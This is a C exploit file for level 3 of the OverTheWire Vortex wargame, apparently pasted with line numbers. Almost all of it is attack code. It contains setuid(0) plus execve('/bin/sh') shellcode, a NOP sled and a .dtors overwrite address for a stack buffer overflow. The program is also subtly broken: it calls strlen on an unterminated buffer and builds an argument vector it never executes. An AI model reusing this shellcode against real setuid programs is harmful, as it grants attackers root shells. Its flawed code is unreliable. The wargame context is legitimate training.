/* Vortex wargames exploit for level 3 - http://www.overthewire.org/wargames/vo

1. /* Vortex wargames exploit for level 3 - http://www.overthewire.org/wargames/vortex/level03
2. * by al3x - 2008.
3. * Stack based buffer overflow to overwrite lpp pointer which has to be in the correct range.
4. * if (((unsigned long) lpp & 0xffff0000) != 0x08040000)
5. *
6. * 28 **lpp = (unsigned long) &buf;
7. * Writes address of buffer into dtors section by using
8. * 08049610 l O .data00000000 p.5841
9. */
10.  
11. #include <unistd.h>
12. #include <stdio.h>
13. #include <stdlib.h>
14. #include <string.h>
15.  
16. #define NOP 0x90
17.  
18. /* 32 bytes setuid(0) + execve("/bin/sh",["/bin/sh",NULL]); */
19. char shellcode[] =
20.  
21. "\x6a\x17" // push $0x17
22. "\x58" // pop %eax
23. "\x31\xdb" // xor %ebx, %ebx
24. "\xcd\x80" // int $0x80
25.  
26. "\x31\xd2" // xor %edx, %edx
27. "\x6a\x0b" // push $0xb
28. "\x58" // pop %eax
29. "\x52" // push %edx
30. "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
31. "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
32. "\x89\xe3" // mov %esp, %ebx
33. "\x52" // push %edx
34. "\x53" // push %ebx
35. "\x89\xe1" // mov %esp, %ecx
36. "\xcd\x80"; // int $0x80
37.  
38. int main(int argc, char *argv[]) {
39.  
40.  
41. if (argc != 2)
42. printf("%s <vuln program>\n",argv[0]);
43.  
44. char addr[] = "\x10\x96\x04\x08";
45. char nops[97];
46. int i, len, ret;
47.  
48. // 32 + 97 + 4 = 133
49. printf("sclen = %d\n", sizeof(shellcode));
50. printf("nops = %d\n",sizeof(nops));
51. printf("addr = %d\n",sizeof(addr));
52.  
53. len = sizeof(shellcode) + sizeof(nops) + sizeof(addr);
54.  
55. char buf[len];
56.  
57. memcpy(buf, shellcode,strlen(shellcode));
58.  
59. for (i = 0; i < sizeof(nops); i++)
60. nops[i] = NOP;
61.  
62. memcpy(buf+strlen(shellcode),nops,strlen(nops));
63.  
64. memcpy(buf+(strlen(shellcode)+strlen(nops)),addr,strlen(addr));
65.  
66. char *nargv[] = {argv[1],buf, (char *)0};
67.  
68. }